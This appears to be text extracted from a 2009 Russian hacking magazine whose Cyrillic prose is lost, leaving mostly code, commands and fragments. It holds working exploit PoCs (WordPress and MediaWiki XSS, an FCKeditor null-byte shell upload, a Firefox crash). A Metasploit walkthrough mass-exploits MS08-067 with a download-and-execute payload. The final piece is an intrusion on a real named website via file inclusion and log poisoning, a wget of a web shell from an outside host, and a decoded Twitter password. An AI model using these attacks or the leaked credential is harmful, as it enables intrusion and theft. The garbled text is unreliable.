(clusterssh.sourceforge.net)
. SSH-
, .
, , , .. SSH-.
. ,
. ClusterSSH xterm
, Perl/TK.

11:
.

034

MYENTUNNEL , SSH-

, SSH1. OpenSSH :
vi /etc/ssh/sshd_config
[...]
Protocol 2
PasswordAuthentication no
UsePAM no
[...]

, . , Sshguard
(sshguard.sourceforge.net).
(syslog, syslog-ng, metalog, multilog, raw)

. IP- (pf, ipfw, netfilter/iptables hosts.
allow). sshd, dovecot, proftpd, pure-ftpd,
FreeBSD ftpd, UWimap (imap, pop). Fail2ban
(www.fail2ban.org) Sshdfilter (http://www.csc.liv.ac.uk/~greg/
sshdfilter).z
X 08 /128/ 09

>>

Easy Hack
R0ID
/ R0ID@MAIL.RU /

SKVOZ

:
( , ) , . ,
. , KardaTools,
, .
, , ,
.
Windows,
. ,
. , ,
.
1. HKEY_LOCAL_MACHINE\SOFTWARE\
MICROSOFT\WINDOWSNT\CURRENTVERSION\FONTSUBSTITUTES\,
:
"MS Shell Dlg" = "MS Sans Serif,204"
"MS Shell Dlg 2" = "MS Sans Serif,204"

2. HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\
WINDOWSNT\CURRENTVERSION\FONTMAPPER\ :
"ARIAL" = dword:000000cc
"DEFAULT" = dword:000000cc

3. HKEY_LOCAL_MACHINE\SYSTEM\
CURRENTCONTROLSET\CONTROL\NLS\CODEPAGE\ :
"1251" = "c_1251.nls"
"1252" = "c_1251.nls"
"866" = "c_866.nls"
"ACP" = "1251"
"OEMCP" = "866"

:
FLASH

:
Flash
. ,
,
USB-. : ? -,
Flash, Calculate
Linux Desktop (www.calculate-linux.ru). Gentoo Linux

036


"MACCP" = "10007"
"OEMHAL" = "vga866.fon"

, , . WinXP .
1. .reg :
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\
CodePage]
"1252"="c_1251.nls"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\FontSubstitutes]
"Arial,0"="Arial,204"
"Comic Sans MS,0"="Comic Sans MS,204"
"Courier,0"="Courier New,204"
"Microsoft Sans Serif,0"="Microsoft Sans Serif,204"
"Tahoma,0"="Tahoma,204"
"Times New Roman,0"="Times New Roman,204"
"Verdana,0"="Verdana,204"

2.
.
3. .

, LiveCD,
USB-Flash . :
Calculate Directory Server ( Calculate Linux)

Gentoo Linux
LiveCD
: , , ,
, , , ,

X 08 /128/ 09

>>

HDD, USB-Flash USB-HDD


: ext4, ext3, ext2, reiserfs, xfs jfs

:
1. CD/DVD-, Calculate
Linux Desktop ( www.calculate-linux.ru).
2. / fdisk:
fdisk <drive>

<drive> .

3. , ext4,
ext3, ext2, reiserfs, xfs jfs.
4. :

:
/, -

disk=/dev/sda2 ( sda2 sda3)


set-march=i686 (x86_64) 32
64-
set-format=reiserfs (ext3, ext2, jfs, xfs)

set-video_resolution=1280x1024 (1024x768, 1152x864,


1280x800 ..)
set-hostname=linux
set-mbr=off MBR
set-composite = on|off

, Linux-OS.
,
.

:

, , , .
. ,
- ,
.
, , . DriveCrypt, . , :
1. .
2. .
3. ,
X 08 /128/ 09

037

>>
.
, .
4. , .
5. Drivers, (, C:\) . .
6. , . :
DOS ( )
Vesta ( )

HDD Black Screen ( ;


)

7. , ,
.
, , ,
.
,
. , , :).

20

Whois

78.108.96.47:8080
2009-07-20

189.56.61.33:3128

:).
-,
n- .
Find proxies for Me. . :
,

IP
( IP:
aaa,bbb,ccc,ddd<=255, : eeeee<=65536)

20

Czech Republic

anonymous

Brazil

2009-07-

anonymous

China

2009-07-

Whois

222.218.156.66:80
20

anonymous

Whois

Whois

2. .
3. ,
( Text).
4. ( IP/ ) , .

:
1. , , -.
:
61.172.249.96:80 anonymous

China

2009-07-20

Whois
75.151.214.249:8080
2009-07-20

72.55.136.167:3128
20

anonymous

Canada

2009-07-

anonymous

Brazil

2009-07-

anonymous

Brazil

2009-07-

anonymous

Iraq

2009-07-

Whois

189.127.163.1:3128
20

United States

Whois

189.108.93.244:3128
20

anonymous

Whois

Whois

213.185.116.218

3128

:
,
ACL-.
?
MACA ,

:
, MAC
,
. , , MAC,
IP! ,
. Sterm, Cain&Abel.
:
1. , Configure.

038

2. (
).
3. IP Spoofed Source Address.
:
# .htaccess-
Options +FollowSymLinks
RewriteEngine on
#
# IP
RewriteCond %{REMOTE_ADDR} !^1\.2\.3\.4$
# IP
RewriteCond %{REMOTE_ADDR} !^5\.6\.7\.8$
RewriteRule .* http://www.google.com/ [R=302,L]

IP, (,
X 08 /128/ 09

>>
- ), Google. :
# allow/deny .htaccess-
<limit GET>
satisfy any
order deny,allow
deny from all
allow from 63.76.22.2
allow from 130.116.16.
allow from 130.116.17.

: MD5,


:

allow from 130.116.18.


allow from 130.116.19.
allow from 144.110.36.
require valid-user
</limit>

,
,
. , Winpcap LibInject.

if ($connect->content =~ /Cleartext of $hash is (.*)/)


{
print "Result : $1\n";
} else {
print "Result : Hash not found!\n";
}

! . ,
. , Hashcracking.info. , ,
, ,
.
HashSearcher. mailbrush. 15 MD5-. :
hashcracking.info, md5.rednoize.com, tmto.org, md5pass.info, milw0rm.
com. , ! ,
.
Perl:
$url = "http://md5.hashcracking.com/search.php?md5=$hash;
$lwp = LWP::UserAgent->new();
$lwp->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en;
rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4");
$connect = $lwp -> get($url);
print md5.hashcracking.com
---- ;

: RAINBOW TABLE,
GPU

:
, ,

, , , winrtgen,
. GPU
, Zhu Shuanglei.
(rtgen CUDA)
project-rainbowcrack.com. XSerg. :
# ,
, ,

RainbowTableGenerate.exe md5 alpha 1 8 0 2400 40000000 xek 240

:
Md5 ;
X 08 /128/ 09

alpha ;
1 8 ;
0 ;
2400 40000000 ;
xek ;
240 . GeForce
GTX 280. 240 .
. z

CUDA

039

>>

(ICQ 884888)
/ HTTP://WAP-CHAT.RU /

OBZOR KSPLOITOV
- .
, , .
, WordPress, MediaWiki, Mozilla Firefox, MS
Internet Explorer MS Office,
web cms, WYSIWYG- FCKeditor.

01


WORDPRESS

>> Brief
WordPress
, . Core Security Technologies (http://
www.coresecurity.com/corelabs) ,

( )
.
XSS- , .
./
wp-admin/options-general.php?page=[plugin_page],
.
./wp-admin/admin.php, . :
// ,
./wp-content/plugins
if (isset($_GET['page']))
{
$plugin_page = stripslashes($_GET['page']);
$plugin_page = plugin_basename($plugin_page);
}
...
// Handle plugin admin pages.
if (isset($plugin_page))
{
if ( validate_file($plugin_page) )
{

040

wp_die(__('Invalid plugin page'));


}
if (! ( file_exists(WP_PLUGIN_DIR . "/$plugin_
page") && is_file(WP_PLUGIN_DIR . "/$plugin_page") ) )
wp_die(sprintf(__('Cannot load %s.'),
htmlentities($plugin_page)));
do_action('load-' . $plugin_page);
//,
include(WP_PLUGIN_DIR . "/$plugin_page");
}
...

,
.
.

>> Targets
WordPress 2.8 .
WordPress MU 2.7.1 .
>> Exploit
:
1. Collapsing Archives:
http://[some_wordpress_blog]/wp-admin/admin.php?page=/
collapsing-archives/options.txt

2. - Akismet, :
http://[some_wordpress_blog]/wp-admin/admin.
php?page=akismet/readme.txt

3. XSS Related Ways To Take Action:


X 08 /128/ 09

http://[some_wordpress_blog]/wp-admin/admin.
php?page=related-ways-to-take-action/options.php

Exclude actions by term :


\"/><script>alert(String.fromCharCode(88)+String.
fromCharCode(83)+String.fromCharCode(83))</
script><ahref="

>>

SendUploadResults( '1', '', '',


'The ""' . $sCommand .'"" command isn\'t allowed' );
// Check if it is an allowed type.
if ( !IsAllowedType( $sType ) )
SendUploadResults( 1, '', '',
'Invalid type specified' );
FileUpload( $sType, $sCurrentFolder, $sCommand )
?>

4. Dashboard- WP Security Scanner:


http://[some_wordpress_blog]/wp-admin/admin.
php?page=wp-security-scan/securityscan.php

5. Intrusion Detection System:


http://[some_wordpress_blog]/wp-admin/index.
php?page=wp-ids/ids-admin.php

advisory http://milw0rm.com/
exploits/9110.

>> SOLUTION

, wordpress.com (
2.8.1).

02


FCKEDITOR

>> Brief
FCKeditor, TinyMCE, WYSIWYG- WEB-x, Zope, PHPList, Falt4 CMS, RunCMS, Dokeos, Nuke ET.
,
, CurrentFolder (, www.securitylab.ru/vulnerability/382191.php www.securityfocus.
com/bid/31812). ,
HTML based
.
, (http://dfn.dl.sourceforge.net/
sourceforge/fckeditor/FCKeditor_2.6.4.zip) , upload ./
editor/filemanager/connectors/php/upload.php:
<?php
...
$sCurrentFolder = GetCurrentFolder() ;


GetCurrentFolder(), ./editor/
filemanager/connectors/php/io.php:
function GetCurrentFolder()
{
if (!isset($_GET)) {
global $_GET;
}
$sCurrentFolder = isset( $_GET['CurrentFolder'] )?
$_GET['CurrentFolder'] : '/' ;
// Check the current folder syntax (must begin and
start with a slash).
if ( !preg_match( '|/$|', $sCurrentFolder ) )
$sCurrentFolder .= '/' ;
if ( strpos( $sCurrentFolder, '/' ) !== 0 )
$sCurrentFolder = '/' . $sCurrentFolder ;
// Ensure the folder path has no double-slashes
while ( strpos ($sCurrentFolder, '//') !== false )
{
$sCurrentFolder = str_replace (
'//','/', $sCurrentFolder) ;
}
// Check for invalid folder paths (..)
if ( strpos( $sCurrentFolder, '..' ) ||
strpos( $sCurrentFolder, "\\" ))
SendError( 102, '' ) ;
return $sCurrentFolder ;
}

, , FileUpload()
./editor/filemanager/connectors/php/commands.php:
function FileUpload(
$resourceType, $currentFolder, $sCommand )
{
...
// Map the virtual path to the local server path.
$sServerDir = ServerMapFolder($resourceType,
$currentFolder, $sCommand ) ;

// Is enabled the upload?


if ( ! IsAllowedCommand( $sCommand ) )

// Get the uploaded file name.


$sFileName = $oFile['name'] ;
$sFileName = SanitizeFileName( $sFileName );

MEDIAWIKI
...

$sFilePath = $sServerDir . $sFileName ;

AKISMET/README.TXT WORDPRESS

X 08 /128/ 09

041

>>

FCKEDITOR

-, Amalthea 13
XSS-.
./includes/specials/SpecialBlockip.php site.com/index.php/Special:Block.
, :
CALC.EXE, FIREFOX

...
move_uploaded_file( $oFile['tmp_name'],
$sFilePath ) ;
...
}

ServerMapFolder() folder path


, $currentFolder.
GetCurrentFolder(),
directory traversal,
null-byte.

<?php
...
class IPBlockForm
{
...
function IPBlockForm( $par )
{
global $wgRequest, $wgUser, $wgBlockAllowsUTEdit;
// wpBlockAddress $_REQUEST
$this->BlockAddress = $wgRequest->getVal(
'wpBlockAddress', $wgRequest->getVal( 'ip', $par ) );
$this->BlockAddress = strtr(
$this->BlockAddress, '_', '' );
...
}
...

>> Exploit

FCKeditor ./editor/filemanager/
connectors/uploadtest.html.
, Select the File Uploader to use PHP (,
), Upload a
new file , .txt , ,
Current Folder - my-evil-shell.php%00.
, ,
Uploaded File URL (
./userfiles/test.php).
, $sFilePath move_uploaded_file()
($sServerDir),
($sFileName) - -.

// html-
function showForm( $err )
{
...
$user = User::newFromName( $this->BlockAddress );
...
//
wpBlockAddress -
Xml::input( 'wpBlockAddress', 45,
$this->BlockAddress, array(

FCKEDITOR

>> Targets:
FCKeditor <=2.6.4, web cms,
WYSIWYG-.
>> Solution
, http://www.
fckeditor.net.

03


MEDIAWIKI

>> Brief
-! MediaWiki,

042

X 08 /128/ 09

>>

CALC.EXE, ACTIVEX IE

TUN KERNEL

DENIAL OF SERVICE MOZILLA FIREFOX

'tabindex' => '1',


'id' => 'mw-bi-target',
'onchange' => 'updateBlockOptions()' ) ). "
</td>
</tr>
<tr>"
);
...
}
...
?>

wpBlockAddress ( $thisBlockAddress) ,
.

>> Exploit
.
- :

04

MOZILLA
FIREFOX

>> Brief:
,
. Firefox
3.5, SBerry aka Simon Berry-Byrne
, .
Just-in-Time (JIT,
JavaScript ): JavaScript
HTML (, font)
, escape().
, , Andrew Haynes
( Denial of Service)
Mozilla Firefox 3.5 Unicode Data Remote Stack Buffer
Overflow Vulnerability. unicode- write JS.
>> Targets
Firefox 3.5 , , .

http://site.com/index.php/Special:Block/?wpBlockAddre
ss="/><script>alert('Privet! Ya MegaXSS :)')</script><a
href="

>> Solution
security- mozilla.
com/firefox.

XSS , .

>> Exploit:

PoC (http://milw0rm.com/exploits/9137),
calc.exe,
html- javascript:

>> Targets
MediaWiki:
MediaWiki <= 1.14.0
MediaWiki <= 1.15.0
>> Solution
,
mediawiki.org/wiki/Download.
X 08 /128/ 09

<html>
<head>
<script language="JavaScript" type=Text/Javascript">
var str = unescape("%u4141%u4141");
var str2 = unescape("%u0000%u0000");

043

>>

XSS RELATED WAYS TO TAKE ACTION


var finalstr2 = mul8(str2, 49000000);
var finalstr = mul8(str, 21000000);
document.write(finalstr2);
document.write(finalstr);
function mul8 (str, num) {
var i = Math.ceil(Math.log(num) / Math.LN2),
res = str;
do {
res += res;
} while (0 < --i);
return res.slice(0, str.length * num);
}
</script>
</head>
<body>
</body>
</html>
<html><body></body></html>

write() , ,
unicode-.
Firefox - (
).

05


MICROSOFT OFFICE WEB
COMPONENTS SPREADSHEET ACTIVEX

>> Brief:
.
IE,
Microsoft Office Web Components Spreadsheet ActiveX. ActiveX
Internet Explorer
Excel. , ,
msDataSourceObject()
(OWC 10 OWC11). (,
iframe)

. , IE,
MS Office,
.

44
044

>> Exploits

http://www.securitylab.ru/vulnerability/382430.php.

ActiveX, , OWC10.Spreadsheet
OWC11.Spreadsheet.
>> Targets:
Microsoft Office XP Service Pack 3;
Microsoft Office 2003 Service Pack 3;
Microsoft Office XP Web Components Service Pack 3;
Microsoft Office Web Components 2003 Service Pack 3;
Microsoft Office 2003 Web Components for the 2007 Microsoft Office system
Service Pack 1;
Microsoft Internet Security and Acceleration Server 2004 Standard Edition
Service Pack 3;
Microsoft Internet Security and Acceleration Server 2004 Enterprise Edition
Service Pack 3;
Microsoft Internet Security and Acceleration Server 2006;
Internet Security and Acceleration Server 2006 Supportability Update;
Microsoft Internet Security and Acceleration Server 2006 Service Pack 1;
Microsoft Office Small Business Accounting 2006.
>> Solution:
, Microsoft .
CLSID:
{0002E541-0000-0000-C000-000000000046}
{0002E559-0000-0000-C000-000000000046}

06


LINUX

>> Brief:
17 *Nix-,
grsecurity Brad Spengler PoC
Linux.
, Linux
.
, net/tun - tun_chr_pool() drivers/net/tun.c:
X 08 /128/ 09

>>

XSS MEDIAWIKI

struct sock *sk = tun->sk;


// initialize sk with tun->sk
...
if (!tun)
return POLLERR;

// if tun is NULL return error

, :
sk ,
. ,
, , .
,
,
if(!tun).
, ,
0x00000000,
.

>> Exploits
,

http://milw0rm.com/exploits/9191.
>> Targets:
Linux kernel <= 2.6.30 ( GCC
-fdelete-null-pointer-checks).

>> Solution:

GIT- : http://git.
kernel.org. z
X 08 /128/ 09

045

>>
START


M0R0 / M0R0@INBOX.RU /

>>

, ,
? , , .
,
. , Metasploit,
.
-
. ?
, , -

.
x-tool'z,
, ..
.
, ,
.
,

. ,
,
.

XP
MS08_067 DB_UTOPWN
,

046

,
, . , 0-day,
. -,
nmap , ,
winpcap, .
EasyHack SKVOZ (z 2009)
. ,
.
,
. ,
, user guide. . ,
,
conficker
. , SKVOZ nmap
MS08_067.
-

.
.
,
.
2009 Microsoft
20 .
ms09-001 SMB.
, , ,
.
. , .
, .

( ,
).

(
WinXP) , ,
, X 08 /128/ 09

>>

C MS08_067

.

. -,
.
cp866, Windows cp1251,
Koi8-r Unicod.
, meterpreter,
.
.
.
(trac.metasploit.com/ticket/253).
, , . , , ,
.

,

,

. : ,
, -
.
AutoIT, SciTe
AutoIT .
, ,

.
,
SID, ,
SID S-1-5-32-544. SID API-
LookupAccountName, AdvAPI32.dll. Security.
au3 - _Security__LookupAccountName.
(
user.au3 DVD).
X 08 /128/ 09

TraySetState 2
AutoIT . , .
,
XP.
exe- .
, .
SMB. ,
,
user.
exe? , .
,

. , ftp.
ftp- ( FileZilla), ,
%temp%
ftp-
.
ftp.exe -s, user.exe .

.
,
. , ,
.
FTP ,
. ,


,
. ,
. , , .
( Radmin, VNC
..) .

, . RDP XP
:

.
, .


Redmond', ,
.

RDP, .
XP ,
( Home Edition, ,
).
,
- -
, , .
- XP ,
termsrv.dll
. ,
. , ,
, , ,
-

047

>>

XP

HTTP://WWW
links

:
metasploit.org.

DVD
dvd
:

final.au3.


termsrv.dll.

.

,
.

048

.
, dll Windows File
Protection. ( CD
), . ,

. ,
, , ,
, .

, , , .
, , , - . , .

. , , ,
metasploit, ,
, , , , , .
, , ,
.
, .
. DVD
final.au3, , .
,
, .
fsp, ,
.
Au3Info
AutoIT. ,
2 .
fsp , .

.
,
RDP. ,
XP, .
XP, sc
, ,

fsp. ,
, .
dll (
TermService, ,
), dll %systemroot%\
system32\DLLCache ( ), , ,
%systemroot%\system32.
.
%temp%,
(, ),
%temp%\final.exe . ? psexec
. RDP.
, .

SMB
SMB
. , , Microsoft, , (
). 14
smb; . ms08_067, , ,
. netapi32.dll,
, wcscat ( , conficker).
RPC- UUID 4b324fc8-1670-01d3-1278-5a47bf6ee188,
srvsvc.
,
. VmWare
, 2008 (
),
. , ,
.
,
ms08_067
!
, Make
SMB Connection error:53 (network path was not found).
, ,
. ,
.
X 08 /128/ 09

>>


DB_AUTOPWN

Fingerprint: Windows XP Service Pack 2+


lang:Russian, SP3.
, ,
.
, sp
+, ,
. ,
(Windows XP SP3 Russian
(NX)) . Exploit
failed: The server responded with error: STATUS_
OBJECT_NAME_NOT_FOUND (Command=162
WordCount=0).
.


Selected Target: Windows XP
SP0/SP1 Universal Exploit failed: The server
responded with error: STATUS_OBJECT_NAME_
NOT_FOUND (Command=162 WordCount=0).
, .
.
BROWSER
SRVSVC, .
, ,

,
.
, !
- .
.
-
.
- ,
. .
-- , !


.
, ,

.




.
,
X 08 /128/ 09

SFX
windows/upexec/
bind_tcp.
.
, ,
, .
,
,
, ,
. windows/download_exec.
Web-,
.
,
, XAMPP. .
URL
.
Exploit failed:
No encoders encoded the buffer successfully.
: download_exec
,
,
stager, , download_exec/bind_tcp.


.
RDP ,
.
,
, .
,
. -,
db_autopwn
,
5. , 5
.
-, db_autopwn

,
sessions l. ,
,
,
download_exec ,
- .

049

>>

WEB- FTP-
XAMPP

INFO

info

Web-
FTP-

,


!
z. XAMPP
(apachefriends.org/
en/xampp.html).

,
PoC.
, ,
,

termsrv.dll ,

, ,
support_388945a0,



.

,
,
.

050

AUTOIT
%appdata%\msf32\
modules\payloads\singles\windows\download_exec.
rb . , , . !
session
Msf::Sessions::CommandShell.
.

, db_autopwn download_exec.
, SKVOZ

-b, ,
bind-.
, .

. ,
,
, . db_autopwn -.
db ( %appdata%\
msf32\lib\msf\ui\console\command_dispatcher\db.rb)
, meterpreter,
generic .
,
X 08 /128/ 09

>>


.
download_exec,
db.rb;
DVD .
- , -
, , -P.
:
-P,
; , .

.
,
.
%appdata%\.msf3\config
.
,
ms08_067
:
- TARGET=0 ( );
X 08 /128/ 09

- PAYLOAD=windows/download_exec/
bind_tcp;
- URL=http://172.16.1.10/st.exe.

172.16.1.10 , Web-, st.exe ,


. , ,
.


, ,
.
,
RDP. .
metasploit
:

load db_sqlite3
db_create
db_nmap -sT -PN -PS445 -p445
172.16.1.0/24
setg URL http://172.16.1.10/st.exe
db_autopwn -e -p -P windows/
download_exec/bind_tcp -m ms08_067

<ENTER> .

.
sessions l,
30 ,
. , mstsc . ! 30- ,
5 .
, ESET NOD32 4, Dr.Web

. ,
Outpost Kaspersky Anti-Hacker.
. NMAP 116
445,
30.
, ,


! , ?
,
SRVSVC.


, !
,

(forum.antichat.ru/thread99665.html),
, .
, ,
. :
- , ,
!. , :).
,
.
,
! , ,
!
! z

051

>>
Payment Card Industry Data Security Standard (PCI DSS)

S4AVRD0W / S4AVRD0W@P0C.RU /

PCI DSS

>>


.
, .
, .
.
OSSTMM
OWASP.
-
, , Cobit, ISO/IEC
2700x, CIS/SANS/NIST/etc
PCI DSS.
, ,
,
. ,
. ,
.

,

052

, / .

,
,
OSSTMM
OWASP. , PCI DSS OWASP
(AsV), (QSA).
PCI DSS

:
1. (
)
.
2. -

(DoS). ,

.
3.
(PAN, Cardholder Name
..). (gray box)


.

,
24/7.

PCI :
X 08 /128/ 09

>>
Payment Card Industry Data Security Standard (PCI DSS)

DTP-
.11.1(b)
.11.2
(AsV)
.11.3.1
(Network-layer
penetration tests)
.11.3.2
(Applicationlayer penetration tests)

,
.



,

. ,
,

.
,
,

( , . Forb) . ,
PCI DSS, ,
:
(, , , ..)
(ACL/)
Web-
( , )

-
,
X 08 /128/ 09

(,
N ),

, ,


.

NETWORK-LAYER
PENETRATION TESTS

(promiscuous
mode).

Wireshark CommView.
, 1-2 .


.

:
(STP, DTP
..)
(RIP,
EIGRP ..)
(DHCP, BOOTP)
(telnet, rlogin
..)

,
, ,
. ,
,
.
:

MITM (Man in the


middle) ,
DHCP, RIP
STP
(Root Bridge),
DTP (enable trunking);



Yersinia.
,
DTP-
( ). DTP
ACCESS/DESIRABLE
. .

OSI.
ARPpoisoning. . ,
, Cain&Abel Ettercap
( ,
, SSL). ,
ARP-poisoning
,
,
, .
,
, /
, -
( , ,
, etc).
ARP-poisoning

,
(

053

>>

WEB-BASED
SAINTEXPLOIT

INFO

info


:).

CORE IMPACT

NTLM), SNMP-community string .


-
,
(rainbow tables), . - ,
.
,
CAV2/CVC2/CVV2/CID/PIN, .
cap- NetResident / 0x4553-Intercepter. ,
,
.

APPLICATION-LAYER
PENETRATION TESTS
HTTP://WWW
links
pcisecuritystandards.
org PCI Security
Standards Council.
pcisecurity.ru ,
PCI DSS .
pcidss.ru ,
PCI DSS Digital
Security.
isecom.org/osstmm
Open Source
Security Testing
Methodology Manual.
owasp.org Open
Web Application
Security Project.

054

OSI. , ,

. ? .
Nmap Fast scan ( -F -T Aggressive|Insane),
( -p), ,
,
.
Nessus
XSpider ( ) .
(, Windows
NT 4.0), PCI .
,
- , .
PCI , -,

(
), -,

.


. . :).
.
,

. , -

. , .
,
.

1.

,
,
( !) -.
,
, . ,
. Core
Impact,
GUI-.
,
.
, , Core Impact, ,
, , ,
. Core Impact

.
: Core Impact, CANVAS, SAINTexploit
Metasploit Framework. , . ,
.
(,
).
Metasploit Framework. ,
zero-day , .
, ,
.

:).
, ,
.
. ,
, SAM (fgdump)
, LSA
(Cain&Abel),
. ,
PCI DSS (. 2.1, .2.1.1, .6.3.5, .6.3.6, .8.4,
.8.5.x).
X 08 /128/ 09

>>

GUI CANVAS METASPLOIT


METASPLOIT FRAMEWORK

2.

,
.
Windows (SMB),
.
,

, , ,
. PCI, ,
.
,
,
.

3.
, ,
-.
, , ( ,
SNMP) . AsV-
PCI DSS
,
DoS.
PCI,

(, WEB, ..).
Web. PCI Web . QSA-.
blackbox- server/client-side .

,
Web. HP WebInspect
Acunetix Web Vulnerability Scanner (,
, AJAX).
,
, w3af,

X 08 /128/ 09

Web-.

Web! , ,
, -,
, SQL,
- . client-side , ,

, .
server-side ,
- , PCI DSS.
, PAN, Cardholder Name CVC2/
CVV2 . ,
,
SQL-
, ;
,
. Blind
SQL-, Web-
sqlmap ( --dump-all),
MySQL, Oracle, PostgreSQL
Microsoft SQL Server.
.
. ,
AppDetective Application Security Inc.,
. ,
,
,
AppDetective,
, .

, ,

. ,
:
Oracle Database Client

Toad for Oracle
PL/SQL
Oracle Assessment Kit SID
PL/SQL

(,

)

PCI
, , ,
,
, Open AP, WEP WPA/
PSK. , PCI
,
.
. , , aircrack-ng.
, ,
Caffe Latte,
.
Wirelessdefence.org.




PCI DSS. , ,

,
.
PCI,
MasterCard AsV-.


,

PCI DSS,
,
,
,

MasterCard.
! z

055

>>
IN RESPONSE TO THE COMMANDS FROM
A MALICIOUS USER, CONCURRENT ATTACKS
TO TARGETING SITE BEGIN

Controlling
Server

Bot Infection
NUMBER OF COMMANDS

Concurrent
Attacks
- Infection Activities
- DoS Attacks
- Spam Mails
- Spyware
- Upgrades its
functionalities, etc

Malicious
User

Internet
User

Targeting Site
for Attacks

PREDIDENTUA / HTTP://TUTAMC.COM, SPIRT40@GMAIL.COM /

>>

,
, --
.
- ( !). ,
, .
.

. , ,
:).
, 2
. ,
, , , .

056

,
...
1000 10.000 ,
, , .
,
100.000.

,
,
.
X 08 /128/ 09

>>
IN RESPONSE TO THE COMMANDS FROM
A MALICIOUS USER, CONCURRENT ATTACKS
TO TARGETING SITE BEGIN

Targeting Site
for Attacks


P2P

:)
, . , ,
, ,
,
.
, , .
, ,
, , . ,

.
,
: ,
, .
.

, ,
.
, (

!
,
.
:
, :).
:

. .
:
?
? :).

X 08 /128/ 09

, , .) . :
.
, .


.
IRC,
,
- . ,
,
.
p2p web.
p2p ,
.
,
.
:




...

web'
. , Zeus.
,
(
).
, ,
,
,
,
.
.



,
. ,
.
, (). ,
.
:
1234, : 6452, 12, 761 ..
, .
, ,
, -
,
.
.
:

, -

,

,

, ,
,
. . :
.com
.org
.ho.ua

057

>>
Controlling
Server

IN RESPONSE TO THE COMMANDS FROM


A MALICIOUS USER, CONCURRENT ATTACKS
TO TARGETING SITE BEGIN
Bot Infection

HTTP://WWW
links

RSA-:
ru.wikipedia.org/wiki/
RSA.

Malicious
: ru.wikipedia.
User
org/wiki/__.
:
ru.wikipedia.org/wiki/
.

IRC-


INFO

info
RSA (
Rivest, Shamir
Adleman)
.
RSA ,

,
.

,

.ho.ua .
,
, .
. , , , , temp123.
txt, .
, , ,
.
( , ).
; , temp123.
txt . -
( , ..), . ,
.
,
, .

(, .
Pseudorandom number generator, PRNG) ,
,

( ).

-
.
.
. ORNL (.):
,
.
. ,
. :
,
, .

.
. .
:

,
,
, . .
:

WARNING

warning


.

058

: 3001-3004

:
3001 3004 . 4 ,
.
,
. 4 ( )

RSA-
X 08 /128/ 09

>>
Controlling
Server

IN RESPONSE TO THE COMMANDS FROM


A MALICIOUS USER, CONCURRENT ATTACKS
TO TARGETING SITE BEGIN
Bot Infection

, ,


RSA-
, ,
).
, , :
___: " "

RSA
: 3001

,
,
,
.


,
-
- .
.
, ,
, , , , , . ,
AES-,
BASE64. , ,

, .
, .
,
Perl', , ,
.
RSA. RSA
, ,
, .
. :
, . - .
:
1. _
2. tutamc.com
X 08 /128/ 09


3. 00:01 08.07.2009
4. 23:59 09.07.2009
5. 1
6. ...
7. ___

, .
,


( ).
(, ) ,
, . ,
, ,
,
. ,

, ,
.
.
RSA 2048 .
. ,
,
- , AES.

.
, , .

(


,
. .
, ,
, ,
, .
RSA.
.
, .

POST-.
,
( , tttt123.php).

, ( tttt123.php
). ,
, , .

, . ,
. ,
.
Python'e,
. ,
,

.

FROM MY
, ( )
, , (
) , . ,
. z

059

>>

/ ICQ 884888, HTTP://WAP-CHAT.RU /

TWITTER-
,
- , . ,

( ).
. ,
V ,
.

,
http://www.
stephenfry.com ,

-, .
stephenfry.com/clubfry/twitter.
API , ,
-
:). ,
twitter (twitter.com/stephenfry),
644,489(!) .



.
WordPress
phpBB.
(stephenfry.
com/blog), :

060

<meta name="generator"
content="WordPress 2.5.1" />

, 2.5.1
,
.

phpBB. ,
stephenfry.
com/forum/docs/CHANGELOG.html.
change Changes since 2.0.20,
,
- (, ,
XSS CSRF ).
XSS phpBB,

:
site:stephenfry.com filetype:php

PHP-, . stephenfry.com/section.php?
section=clubfry&subsection=twitter.
:
, .
,
:
stephenfry.com/section.php?section
=clubfry&subsection=/../../../../.
./../../../../../../../../../../..
/etc/passwd%00

/etc/passwd :).
-
! ,
.


z,

X 08 /128/ 09

>>

STEPHENFRY.COM
, /proc/self/*.

/proc/self/environ:
stephenfry.com/section.php?section
=clubfry&subsection=/../../../../.
./../../../../../../../../../../..
/proc/self/environ%00

, /proc/self/environ
:(.
.
, error_log /proc/self/fd/2 ( , access_log
-
, LFI).
error_log
referer,

PHP-. , .

:
[Sat Jul 11 23:39:21 2009] [error]
[client x.x.x.x] client sent
HTTP/1.1 request without hostname
(see RFC2616 section 14.23): /


evil-,
Host. , , :

STEPHENFRY.COM

z:/usr/local/bin/curl.exe "http://
www.stephenfry.com/" -H "Host:"
--referer "<?php eval($_GET[cmd]);
?>"

,
error_log:
[Sat Jul 11 23:39:21 2009] [error]
[client x.x.x.x] client sent
HTTP/1.1 request without hostname
(see RFC2616 section 14.23): /,
referer: <?php eval($_GET[cmd]); ?>

X 08 /128/ 09

061

>>

HOST

HTTP://WWW
links
www.stephenfry.
com
.
ru.wikipedia.org/
wiki/_

.
twitter.com/
stephenfry
.

INFO

info

(Stephen John
Fry)
,
,
(
,

).




(1997).

, , ,



.

062


:
http://www.stephenfry.com/section.php?sec
tion=clubfry&subsection=/../../../../../..
/../../../../../../../../../../proc/self/
fd/2%00&cmd=phpinfo();

find
./ -type d -perm 0777 -ls , , .
/home/fry/public_html/img/blog_thumbs/
C99madShell blog.php wget:
http://www.stephenfry.com/section.php?sec
tion=clubfry&subsection=/../../../../../..
/../../../../../../../../../../proc/self/
fd/2%00&cmd=system('wget -O /home/fry/public_
html/img/blog_thumbs/blog.php http://madnet.
name/files/download/9_c99madshell.php');


. /home/fry/public_html/index.php:
<?php
include_once("lib/sf_main.php");

$aryBlogEntry = fnGetHomepageBlogArray();
$aryBlogStats = fnGetBlogStatsArray();
$aryForumStats = fnGetForumStatsArray();
$strSection = "";
$strSubSection = "";
include(SF_BASE_DIR."/templates/
navigation/header.php");
...
?>

lib/sf_main.php:
<?php
include_once
include_once
include_once
include_once
...
?>

"sf_constants.php";
"sf_db_class.php";
"sf_template.php";
"sf_cache_functions.php";

, , lib/sf_constants.php:
<?php
...
// Twitter
define('SF_TWITTER_USER','stephenfry');
define('SF_TWITTER_PASSWORD','dzQxbGE4eW9uMz
X 08 /128/ 09

>>

d3bzQ=');
...
?>

, SF_TWITTER_PASSWORD
base64,
base64_decode w41la8yon37wo4.
! (
).
twitter.com
.

